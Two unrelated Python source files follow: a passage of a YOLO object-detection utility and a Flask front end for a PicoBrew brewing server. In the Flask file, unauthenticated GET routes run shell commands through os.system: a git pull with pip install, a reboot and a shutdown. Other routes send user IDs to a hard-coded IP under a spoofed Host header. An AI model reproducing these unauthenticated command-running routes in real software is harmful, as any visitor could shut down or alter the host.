range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights(YOLO_CUSTOM_WEIGHTS) # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
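# Worked example for image_preprocess() (illustrative): a 1280x720 frame
# letterboxed for a 416x416 network is scaled by min(416/1280, 416/720) = 0.325
# to 416x234, then padded with (416 - 234) // 2 = 91 gray rows on top and bottom.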
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
label = "{}".format(NUM_CLASS[class_ind]) + score_str
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
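# Sanity-check sketch for bboxes_iou(): two unit squares that overlap by half
# share an intersection of 0.5 and a union of 1.5, so the IoU is 1/3.
#
#   bboxes_iou(np.array([0, 0, 1, 1]), np.array([0.5, 0, 1.5, 1]))  # -> ~0.333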
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: Determine whether the number of bounding boxes is greater than 0
while len(cls_bboxes) > 0:
            # Process 2: Select the bounding box with the highest score (call it box A)
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
            # Process 3: Compute the IoU between box A and the remaining boxes,
            # then suppress (or down-weight) the boxes whose IoU exceeds the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
    # 3. clip boxes that are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
    original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)  # NOTE: this second conversion swaps the channels back to BGR
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
        # Keep the window open until a key is pressed
        cv2.waitKey(0)
        # Then close the window
cv2.destroyAllWindows()
return image
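# Illustrative usage sketch for detect_image() (paths are placeholders):
#
#   yolo = Load_Yolo_model()
#   detect_image(yolo, "IMAGES/street.jpg", "IMAGES/street_pred.jpg",
#                input_size=YOLO_INPUT_SIZE, show=True, rectangle_colors=(255, 0, 0))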
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.list_physical_devices('GPU')")
Yolo = Load_Yolo_model()
times = []
SUM = 0
is_first_detection = True
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
Processing_times.put(time.time())
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
#print("Do prediction")
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
#print("OK")
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
SUM += (t2-t1)
if is_first_detection == True:
SUM = 0
is_first_detection = False
print("prediction started")
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
if Frames_data.qsize()==0 and SUM != 0:
#time.sleep(0.1)
print(SUM)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
started = False
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while not started and Frames_data.qsize() > 0:
if Processed_frames.qsize() == 0:
time.sleep(0.1)
continue
else:
started = True
start_time = time.time()
break
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
end_time = time.time()
print("total_duration", end_time-start_time)
cv2.destroyAllWindows()
# detect from video
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
SUM = 0
is_first_detection = True
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, img = vid.read()
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
t3 = time.time()
times.append(t2-t1)
SUM += (t2-t1)
if is_first_detection:
SUM = 0
is_first_detection = False
start_time = time.time()
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
end_time = time.time()
print(SUM)
print("total_duration", end_time-start_time)
cv2.destroyAllWindows()
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, frame = vid.read()
try:
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
routes_frontend.py
|
import json
import os
import requests
import sys
import uuid
from flask import render_template, request, redirect
from threading import Thread
from time import sleep
from . import main
from .recipe_parser import PicoBrewRecipe, PicoBrewRecipeImport, ZymaticRecipe, ZymaticRecipeImport, ZSeriesRecipe
from .session_parser import load_ferm_session, get_ferm_graph_data, get_brew_graph_data, load_brew_session, active_brew_sessions, active_ferm_sessions
from .config import base_path, zymatic_recipe_path, zseries_recipe_path, pico_recipe_path, ferm_archive_sessions_path, brew_archive_sessions_path
# -------- Routes --------
@main.route('/')
def index():
return render_template('index.html', brew_sessions=load_active_brew_sessions(),
ferm_sessions=load_active_ferm_sessions())
@main.route('/restart_server')
def restart_server():
# git pull & install any updated requirements
os.system('cd {0};git pull;pip3 install -r requirements.txt'.format(base_path()))
# TODO: Close file handles for open sessions?
def restart():
sleep(2)
os.execl(sys.executable, *([sys.executable]+sys.argv))
thread = Thread(target=restart, daemon=True)
thread.start()
return redirect('/')
@main.route('/restart_system')
def restart_system():
os.system('shutdown -r now')
# TODO: redirect to a page with alert of restart
return redirect('/')
@main.route('/shutdown_system')
def shutdown_system():
os.system('shutdown -h now')
# TODO: redirect to a page with alert of shutdown
return redirect('/')
@main.route('/brew_history')
def brew_history():
return render_template('brew_history.html', sessions=load_brew_sessions())
@main.route('/ferm_history')
def ferm_history():
return render_template('ferm_history.html', sessions=load_ferm_sessions())
@main.route('/zymatic_recipes')
def _zymatic_recipes():
global zymatic_recipes
zymatic_recipes = load_zymatic_recipes()
recipes_dict = [json.loads(json.dumps(recipe, default=lambda r: r.__dict__)) for recipe in zymatic_recipes]
return render_template('zymatic_recipes.html', recipes=recipes_dict)
@main.route('/new_zymatic_recipe', methods=['GET', 'POST'])
def new_zymatic_recipe():
if request.method == 'POST':
recipe = request.get_json()
recipe['id'] = uuid.uuid4().hex[:32]
filename = zymatic_recipe_path().joinpath('{}.json'.format(recipe['name'].replace(' ', '_')))
if not filename.exists():
with open(filename, "w") as file:
json.dump(recipe, file, indent=4, sort_keys=True)
return '', 204
else:
return 'Recipe Exists!', 418
else:
return render_template('new_zymatic_recipe.html')
@main.route('/import_zymatic_recipe', methods=['GET', 'POST'])
def import_zymatic_recipe():
if request.method == 'POST':
recipes = ''
data = request.get_json()
guid = data['guid']
machine = next((uid for uid in active_brew_sessions if not active_brew_sessions[uid].is_pico), None)
try:
sync_user_uri = 'http://137.117.17.70/API/SyncUSer?user={}&machine={}'.format(guid, machine)
print('DEBUG: import_zymatic_recipe - {}'.format(sync_user_uri))
r = requests.get(sync_user_uri, headers={'host': 'picobrew.com'})
recipes = r.text.strip()
except:
pass
print('DEBUG: Zymatic Recipes Dumped: \"{}\"'.format(recipes))
if len(recipes) > 2 and recipes[0] == '#' and recipes[-1] == '#':
ZymaticRecipeImport(recipes)
return '', 204
else:
return 'Import Failed: \"' + recipes + '\"', 418
else:
return render_template('import_zymatic_recipe.html')
@main.route('/update_zymatic_recipe', methods=['POST'])
def update_zymatic_recipe():
update = request.get_json()
files = list(zymatic_recipe_path().glob("*.json"))
for filename in files:
recipe = load_zymatic_recipe(filename)
if recipe.id == update['id']:
recipe.update_steps(filename, update['steps'])
return '', 204
@main.route('/delete_zymatic_recipe', methods=['GET', 'POST'])
def delete_zymatic_recipe():
recipe_id = request.get_json()
files = list(zymatic_recipe_path().glob("*.json"))
for filename in files:
recipe = load_zymatic_recipe(filename)
if recipe.id == recipe_id:
os.remove(filename)
return '', 204
return 'Delete Recipe: Failed to find recipe id \"' + recipe_id + '\"', 418
def load_zymatic_recipes():
files = list(zymatic_recipe_path().glob("*.json"))
recipes = [load_zymatic_recipe(file) for file in files]
return recipes
def load_zymatic_recipe(file):
recipe = ZymaticRecipe()
recipe.parse(file)
return recipe
def get_zymatic_recipes():
global zymatic_recipes
return zymatic_recipes
@main.route('/zseries_recipes')
def _zseries_recipes():
global zseries_recipes
zseries_recipes = load_zseries_recipes()
recipes_dict = [json.loads(json.dumps(recipe, default=lambda r: r.__dict__)) for recipe in zseries_recipes]
return render_template('zseries_recipes.html', recipes=recipes_dict)
@main.route('/new_zseries_recipe')
def new_zseries_recipe():
return render_template('new_zseries_recipe.html')
@main.route('/new_zseries_recipe_save', methods=['POST'])
def new_zseries_recipe_save():
recipe = request.get_json()
recipe['id'] = increment_zseries_recipe_id()
recipe['start_water'] = 13.1
filename = zseries_recipe_path().joinpath('{}.json'.format(recipe['name'].replace(' ', '_')))
if not filename.exists():
with open(filename, "w") as file:
json.dump(recipe, file, indent=4, sort_keys=True)
return '', 204
else:
return 'Recipe Exists!', 418
@main.route('/update_zseries_recipe', methods=['POST'])
def update_zseries_recipe():
update = request.get_json()
files = list(zseries_recipe_path().glob("*.json"))
for filename in files:
recipe = load_zseries_recipe(filename)
if str(recipe.id) == update['id']:
recipe.update_steps(filename, update['steps'])
return '', 204
@main.route('/delete_zseries_recipe', methods=['GET', 'POST'])
def delete_zseries_recipe():
recipe_id = request.get_json()
files = list(zseries_recipe_path().glob("*.json"))
for filename in files:
recipe = load_zseries_recipe(filename)
if str(recipe.id) == recipe_id:
os.remove(filename)
return '', 204
return 'Delete Recipe: Failed to find recipe id \"' + recipe_id + '\"', 418
def load_zseries_recipes():
files = list(zseries_recipe_path().glob("*.json"))
recipes = [load_zseries_recipe(file) for file in files]
return recipes
def load_zseries_recipe(file):
recipe = ZSeriesRecipe()
recipe.parse(file)
return recipe
def get_zseries_recipes():
global zseries_recipes
return zseries_recipes
@main.route('/pico_recipes')
def _pico_recipes():
global pico_recipes
pico_recipes = load_pico_recipes()
recipes_dict = [json.loads(json.dumps(recipe, default=lambda r: r.__dict__)) for recipe in pico_recipes]
return render_template('pico_recipes.html', recipes=recipes_dict)
@main.route('/new_pico_recipe', methods=['GET', 'POST'])
def new_pico_recipe():
if request.method == 'POST':
recipe = request.get_json()
recipe['id'] = uuid.uuid4().hex[:14]
recipe[
'image'] = '000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fffe000ffc01ffffc0000000000000003fff0003f601ff7ff0000000000000000fe7c00dff003de7f8000800030000000ff3e000ff801ff7f80078001fe000000dfbe000ff801feff80070001fe0000009c37000de000dffc0007803ffe0000021c070001c000cbf80007803ffe000000dcbf800dc0002ff0000780ffff000000fc9f800fc0003fe00007a3ffff800003fc1f800fc0000dc00007ffffff000003fc3f801dc0000fc00007f1f8bf000002bcb7800dc0000dc00007f0f9fffc00003c278001c00021c00007f079ff0600023c0f8021c00021c00007fe10fe0200003c1f8001c00021c00007e000ff00000c1c3f00c1c000c1c00007e080ff00000000fe0080600000600007e010ff00000ffffc00fff000fff00007e001ff00000ffff800fff800fff80007e001ff000007ffe0007ff8003ff80007f000fe00000000000000000000000007f001fe00fffe03fff003fffcfffbff87f001fe001fffc0ffff03fffcffffffc7e0007e00cfff633c3f807e3e1cfdede7e0017e006fffb13f9fc03f9f3dfdefe7e0017e000ffff8bfefc03fdf3cffe7e7e0017e0007eef8b7ffe037df1cfdf787f0017e0001e6bc87a7e0073f18f8ff07f0017e0005cc3c841bf02fbf1aefff07f8dffe02070d7c3c3ff030df1e4ece07fdffff8c24067c303fe0ffe00e0e4e07fdffff003df778f79bc0ffe00f1f0e07fddffe010dff30bfcdf0afec0f1f0e07fc08ff7015fd38afedb82fce0f1e1e07fffffe0001e4388f21bc8f0f061e1c07fffffc0001e03c8f203c0f4f061e1c07e0017c0061f07f07003d078f063e1c07c0003e000000fe01987c000f033f1c03e0007c00ffffffffcfffffff03fff800ff9ff000fffffbffeffbffff03fbf800000000007fffe1ffe3f1ffff00f9f800000000001fff00ffc0c0fffe007070000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
filename = pico_recipe_path().joinpath('{}.json'.format(recipe['name'].replace(' ', '_')))
if not filename.exists():
with open(filename, "w") as file:
json.dump(recipe, file, indent=4, sort_keys=True)
return '', 204
else:
return 'Recipe Exists!', 418
else:
return render_template('new_pico_recipe.html')
@main.route('/import_pico_recipe', methods=['GET', 'POST'])
def import_pico_recipe():
if request.method == 'POST':
recipe = ''
data = request.get_json()
rfid = data['rfid']
uid = next((uid for uid in active_brew_sessions if active_brew_sessions[uid].is_pico), None)
try:
get_recipes_uri = 'http://137.117.17.70/API/pico/getRecipe?uid={}&rfid={}&ibu=-1&abv=-1.0'.format(uid, rfid)
print('DEBUG: import_pico_recipe - {}'.format(get_recipes_uri))
r = requests.get(get_recipes_uri, headers={'host': 'picobrew.com'})
recipe = r.text.strip()
except:
pass
print('DEBUG: Pico Recipe Dumped: \"{}\"'.format(recipe))
if len(recipe) > 2 and recipe[0] == '#' and recipe[-1] == '#' and recipe != '#Invalid|#':
PicoBrewRecipeImport(recipe, rfid)
return '', 204
else:
return 'Import Failed: \"' + recipe + '\"', 418
else:
return render_template('import_pico_recipe.html')
@main.route('/update_pico_recipe', methods=['POST'])
def update_pico_recipe():
update = request.get_json()
files = list(pico_recipe_path().glob("*.json"))
for filename in files:
recipe = load_pico_recipe(filename)
if recipe.id == update['id']:
recipe.update_steps(filename, update['steps'])
return '', 204
@main.route('/delete_pico_recipe', methods=['GET', 'POST'])
def delete_pico_recipe():
recipe_id = request.get_json()
files = list(pico_recipe_path().glob("*.json"))
for filename in files:
recipe = load_pico_recipe(filename)
if recipe.id == recipe_id:
os.remove(filename)
return '', 204
return 'Delete Recipe: Failed to find recipe id \"' + recipe_id + '\"', 418
def load_pico_recipes():
